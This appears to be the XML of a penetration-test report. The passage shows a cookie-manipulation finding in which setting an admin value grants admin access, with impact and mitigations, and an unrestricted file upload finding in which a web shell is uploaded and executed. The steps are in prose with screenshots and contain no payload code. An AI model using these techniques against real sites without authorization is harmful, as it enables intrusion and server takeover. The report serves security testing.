    <w:p w14:paraId="6599E801" w14:textId="77777777" w:rsidR="00063AAF" w:rsidRPr="00F94EEA" w:rsidRDefault="00063AAF" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDEC7C3" wp14:editId="20A28B16">
            <wp:extent cx="5902421" cy="1945843"/>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993" cy="1967130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00236CF9" w14:textId="77777777" w:rsidR="00493DB7" w:rsidRDefault="00493DB7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="643"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F07A6B" w14:textId="14BF2108" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00493DB7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> It appears that thanks to the change we made in the cookie information, the server recognizes the request as a request from an Admin user and </w:t>
      </w:r>
      <w:r w:rsidR="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> us </w:t>
      </w:r>
      <w:r w:rsidR="00493DB7">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to enter the admin's search page</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Let's go back to the proxy tab, change the value of the admin variable to 1 as we just did, click "forward" and then change the state of the "intercept is on" to "intercept is off" button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68C1BA" w14:textId="31953CCE" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="643"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It looks like we're now on the "Advanced Search" page with Admin permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C12BFD2" w14:textId="2655BAD3" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41ECFAE8" w14:textId="77777777" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707DE9FF" w14:textId="77777777" w:rsidR="00063AAF" w:rsidRPr="00F94EEA" w:rsidRDefault="00063AAF" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BE9F97" wp14:editId="29FD1A1B">
            <wp:extent cx="3906129" cy="3730752"/>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2490" cy="3736828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2986D1A7" w14:textId="77777777" w:rsidR="00063AAF" w:rsidRPr="00787602" w:rsidRDefault="00063AAF" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE61AE" w14:textId="77777777" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>With this manipulation, attackers can gain access to an interface designed to be reserved for administrators only, and from which they can delete different users at will.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2408826D" w14:textId="72AC7AC2" w:rsidR="00063AAF" w:rsidRPr="00787602" w:rsidRDefault="00063AAF" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201451B9" w14:textId="31AE9A32" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">To minimize the risks of manipulating </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie values </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>​​</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>in order to grant admin privileges, you can do the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FEF69" w14:textId="6B24A290" w:rsidR="00796CD0" w:rsidRPr="00F94EEA" w:rsidRDefault="00796CD0" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Using the http Only feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D6BAA" w14:textId="2EE0AB99" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Encryption of cookie values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23D14A" w14:textId="4DA68E60" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Changing the mechanism so that in any case it is not possible to go beyond the admin's "Advanced Search" page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730D472" w14:textId="575313B2" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29277E4A" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E155796" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551871CE" w14:textId="0C738060" w:rsidR="005F48DA" w:rsidRPr="00787602" w:rsidRDefault="003D4454" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Unrestricted file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D2C6CD" w14:textId="77777777" w:rsidR="005F48DA" w:rsidRPr="00787602" w:rsidRDefault="005F48DA" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA898B1" w14:textId="75B60DE8" w:rsidR="0061271A" w:rsidRPr="00F94EEA" w:rsidRDefault="0061271A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The team recognized that the site had an </w:t>
      </w:r>
      <w:r w:rsidR="003D4454">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>unrestricted file upload</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00491276">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. The profile page has the option to upload files to the site without proper validation. This weakness allows </w:t>
      </w:r>
      <w:r w:rsidR="00491276">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>a malicious user to upload a malicious file onto the web server, which he could use to gain access over the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775AF10" w14:textId="22E6E9EB" w:rsidR="005A7281" w:rsidRPr="00787602" w:rsidRDefault="005A7281" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CEA8B" w14:textId="13DFF522" w:rsidR="007100EE" w:rsidRPr="00924F2E" w:rsidRDefault="0061271A" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00491276" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> profile page has the option to upload a profile </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>picture</w:t>
      </w:r>
      <w:r w:rsidR="00491276" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779A7EB5" w14:textId="50BD35BF" w:rsidR="00924F2E" w:rsidRPr="00F94EEA" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C3B3F0" wp14:editId="58952ACE">
            <wp:extent cx="5274310" cy="158750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87500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AFD771" w14:textId="4BBE6086" w:rsidR="0061271A" w:rsidRDefault="0061271A" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We will upload </w:t>
      </w:r>
      <w:r w:rsidR="00924F2E" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a malicious 'web shell' </w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and appear to receive a courtesy message on uploading the file to the site.</w:t>
      </w:r>
      <w:r w:rsidR="000E6794">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> There was no proper </w:t>
      </w:r>
      <w:r w:rsidR="00EC3531">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>check for our input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924ED7D" w14:textId="1C29CC98" w:rsidR="00924F2E" w:rsidRPr="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A9AB2F2" wp14:editId="6BCFAB94">
            <wp:extent cx="3009900" cy="10858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1085850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D16A8" w14:textId="6B700B7D" w:rsidR="00CF2E0C" w:rsidRPr="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We will notice that our malicious address is indeed included in the site</w:t>
      </w:r>
      <w:r w:rsidR="003B1B63">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code</w:t>
      </w:r>
      <w:r w:rsidR="003B1B63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF2E0C" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE77A04" wp14:editId="1440C5AB">
            <wp:extent cx="5274310" cy="1749425"/>
            <wp:effectExtent l="0" t="0" r="254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49425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="118FA752" w14:textId="0D210993" w:rsidR="007100EE" w:rsidRDefault="0061271A" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We will copy the URL of the image from the site, and then paste it into the URL bar</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, that way we'll reach the exact location where the malicious file is </w:t>
      </w:r>
      <w:r w:rsidR="00924F2E" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>located, causing it to execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D6CBA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this step, using LFI attack in order to execute our malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE7448" w14:textId="5E448822" w:rsidR="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DCF581" wp14:editId="703FE517">
            <wp:extent cx="4114800" cy="2143484"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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763" cy="2146069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06276608" w14:textId="70B765B7" w:rsidR="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDF2786" wp14:editId="2D2B49B5">
            <wp:extent cx="5274310" cy="834390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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4390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C609D4" w14:textId="77777777" w:rsidR="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
